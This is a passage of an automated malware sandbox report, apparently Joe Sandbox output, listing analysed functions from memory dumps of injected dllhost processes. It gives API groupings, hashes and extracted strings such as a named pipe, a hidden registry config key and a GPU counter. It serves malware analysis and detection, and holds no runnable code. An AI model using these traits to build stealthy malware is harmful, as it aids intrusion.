                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction Fuzzy Hash: 30317436619B418EE760DF22B888B5973E1F788FA5F468125DE4E63724EF38C485C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Utilization Percentage
                          • API String ID: 1943346504-3507739905
                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction ID: 2f9c640d9fa439e7ce8e3ee15a8fa47b1f5083edea71d86122f4fbe25f9f2871
                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction Fuzzy Hash: 34318636A19B418EE760DF26A88CB5973E1F788FA4F464125DE4E47B24DF38D495C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                          • String ID:
                          • API String ID: 4184240511-0
                          • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                          • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                          • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                          • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                          • Instruction ID: 440ef79c9e781b6a6d6017f60d44ca5a891f842d25007564eb44eb0e01771f9e
                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                          • Instruction Fuzzy Hash: 73D1AF7A60AB808EEB60DF65D4883AD37A0F785BA8F114115EE8D5BB9EDB34C4D0C741
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction ID: 54e3866d26cd87b9992d3e7cde3df06b779a5ef27fa16b2bd9605348c9374e58
                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction Fuzzy Hash: 0ED18D7260AB808EEB20DF65D4893AD77A0F745BB8F120115EE8D67B9ADB38C5D1C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction ID: 3ebdfee7452cd44503c88e6d8cb8bec0587e98a30b222dcf9940f9fe874f15c0
                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction Fuzzy Hash: 2BD17C7360AB808EEB20DB65D4493AD77A1FB59BA8F120115EE8D57F9ADB34C4D1CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction ID: 387bc85b5ca216f13d58e1bf65820a579ba48c08a494dcc68326150f265b8b6d
                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction Fuzzy Hash: 67414033219B84DAE760CF21E45879A77A1F788B98F458125DE891B758EF38C585CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction ID: edb0de2afce471b558a308e6ca3fb29cd09a8db1c3e6987b9eedb4af46e745d1
                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction Fuzzy Hash: 45414073219B84DAE760CF21E44879A77A1F388BA8F458125DF8A0BB58DF38D585CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                          • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                          • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                          • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                          • String ID: \\.\pipe\$cnt-childproc
                          • API String ID: 166002920-175842701
                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction ID: ea575c8df7d3e6fde5231c6bd111b44ff49953dde4153534a1f3a471e4cf547e
                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction Fuzzy Hash: 9211493662AB4086E7108F21F45875A7760F389BE4F944315EE9D02AA8DF3CC188CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                          • String ID: \\.\pipe\$cnt-childproc
                          • API String ID: 166002920-175842701
                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction ID: 15bc923da9022801c6c094e546059effed9522ccbff9235d07e7d23f672bfad2
                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction Fuzzy Hash: 5711493661AB4086E7108B21F45C75A77A0F389BE4F944315EE9E06AA8DF3CC188CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: 699074b22535e9c000d37ce6afaa4d5dad913a5ac1e0a76b6fb9b997b329967f
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: 5581E02060F3414EFB54AB2A984D3996699BBC6BB0F474025AE2D4B7DEDA38C9C5C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: 4980207233a2cd6c0dd7f65a3f94bf2c1fbfaad38b626d0103e03e756a493b07
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: 0681243070F7408FFB50AB65A49D3A962D4BB85BB4F478025AE0D6B396DB38C8C5C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: e381b705765ea25d245bbb390176b92e83a418391d3dc14817f7e75e515d071d
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: 6581E333F0F7408EFB54AB65944D3A966E5BB857B0F464025AE0D8BF96DB38C9C58304
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279B31
                          • GetLastError.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279B3F
                          • LoadLibraryExW.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279B69
                          • FreeLibrary.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279BD7
                          • GetProcAddress.KERNEL32(?,?,?,00000279A9279C6B,?,?,?,00000279A927945C,?,?,?,?,00000279A9278F65), ref: 00000279A9279BE3
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction ID: 3c1a32542c1f91467cac97c9a9bf56b6cc3c95d150475e34e6e01ec10a63a4e9
                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction Fuzzy Hash: 7D318E2525BB409DEF11DB16A808BA523D4FB49BB0F5B5625ED1D5B790EF38C4888350
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9B31
                          • GetLastError.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9B3F
                          • LoadLibraryExW.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9B69
                          • FreeLibrary.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9BD7
                          • GetProcAddress.KERNEL32(?,?,?,00000279A92A9C6B,?,?,?,00000279A92A945C,?,?,?,?,00000279A92A8F65), ref: 00000279A92A9BE3
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction ID: 5674dd7ee4184b68ca04dbdaae9cbdf12e4605e2f0c21c73e7d1817bf7d991a2
                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction Fuzzy Hash: 4731802625B7409DEF52DB17A8087A523D4BB49BB0F5B0A25ED1E4BB90EF38C4848310
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction ID: f259d5baaf8dc0b65041d692ab1f7a34f0b4e8b9fcaad5e653710a183e7a434e
                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction Fuzzy Hash: 39118235329B408AE7608F96F85871977A0F788FF4F558214EE5E87B94CF38C8948744
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction ID: 9e23871bb33162a7f5484f0e6a4f6c7c5e9a7acf06a103b548eeb8875227b70d
                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction Fuzzy Hash: 0911603531AB408AE7618B56E85C71966F4F788BF4F454214EE5E8BB94CF78C4848740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Delete$CloseEnumOpen
                          • String ID: SOFTWARE\$cnt-config
                          • API String ID: 3013565938-2485209673
                          • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                          • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                          • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                          • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction ID: 4c9ea15ea0e5767476d13f4b715dc00e9bffaac5431df93a423a9ac5a114b26e
                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction Fuzzy Hash: 4AD1AB3660AB8886DB70DB4AE49835A77A0F3C8B98F510116EECD577A9DF3CC591CB01
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction ID: 8e6d0e124834aba2f85b9f3ecbc94da23a494134c7798b0ce6af0e2a68077de2
                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction Fuzzy Hash: 3BD18B7720AB8889DB70DB1AE49835A77A0F388B98F114116EECD47BA5DF3DC591CB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
